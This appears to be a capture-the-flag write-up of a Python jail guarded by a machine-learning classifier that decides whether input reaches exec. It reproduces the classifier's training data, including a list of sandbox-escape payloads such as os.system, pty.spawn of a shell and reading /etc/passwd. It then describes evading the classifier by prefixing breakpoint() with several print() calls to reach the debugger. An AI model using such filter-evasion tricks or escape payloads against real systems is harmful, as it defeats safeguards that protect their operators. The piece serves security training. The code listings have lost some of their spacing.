An AI-powered fortress guards a treasure trove of forbidden knowledge. Legends speak of a mystical combination of Machine Learning and Python code, interwoven with an impenetrable pyjail defense mechanism. Your mission, should you accept it, is to breach this formidable barrier and unearth the secrets hidden within. Good luck
Initial Impressions
Connecting to the challenge server, we are presented with Bad Code Detected.... when we try to enter any sort of python commands except print
Looking at the source code, we see that our input is being sent to the ML model via the classification function. If the code is deemed as good_code, we get RCE via the exec function.
If we look at the data that the model is being trained on, we see that good_code.txt mainly consists of print statements while bad_code.txt consists of your usual python3 jail escapes.
#Contents of good_code.txtprint('Hello, World!')x=5; y=10; print(x +y)numbers= [1, 2,3,4,5]; print(sum(numbers))print(''.join(['Hello',' ','World!']))print('The answer is',42)print('Even'ifx%2==0else'Odd')names= ['Alice', 'Bob','Charlie']; print(', '.join(names))importmath; print(math.sqrt(16))x,y=2,3; print(x *y)print(' '.join([str(i) for i in range(10)]))print(sorted([3, 2,1]))print(len('Hello'))print('Python'.upper())print(max([4, 1,7,3]))print('Hello, World!'[::-1])print(chr(65))print(ord('A'))print(2 **10)print('Hello, World!'.split(','))print([i **2foriinrange(5)])x=5; y=2; print(x **y)print(any([True, False,False]))print(all([True, True,True]))print(bin(42))print(hex(255))<snip>
#Contents of bad_code.txtos.system("ls")os.popen("ls").read()commands.getstatusoutput("ls") commands.getoutput("ls")commands.getstatus("file/path")subprocess.call("ls",shell=True)subprocess.Popen("ls",shell=True)pty.spawn("ls")pty.spawn("/bin/bash")platform.os.system("ls")pdb.os.system("ls")importlib.import_module("os").system("ls")importlib.__import__("os").system("ls")imp.load_source("os","/usr/lib/python3.8/os.py").system("ls")imp.os.system("ls")imp.sys.modules["os"].system("ls")sys.modules["os"].system("ls")__import__("os").system("ls")importosfromosimport*open("/etc/passwd").read()open('/var/www/html/input','w').write('123')execfile('/usr/lib/python2.7/os.py')system('ls')exec()exec("print('RCE'); __import__('os').system('ls')") exec("print('RCE')\n__import__('os').system('ls')")<snip>
So the exploit most likely has to do something with print.
Solve
My teammates suggested using the breakpoint function which will allow us to enter into PDB (Python Debugger) and execute python commands.
However if we try to execute the function as it, it gets classified as bad code.
You can also trick the machine learning model into interepting the code as good code by entering multiple print() before appending breakpoint() to the end.
I suspect the reason why breakpoint() is being blacklisted in the first place is because of the use of () which is prevalent in the training data for bad code.
If I try using multiple prints with a known "bad code payload" such as import os or exec(), it doesn't seem to work.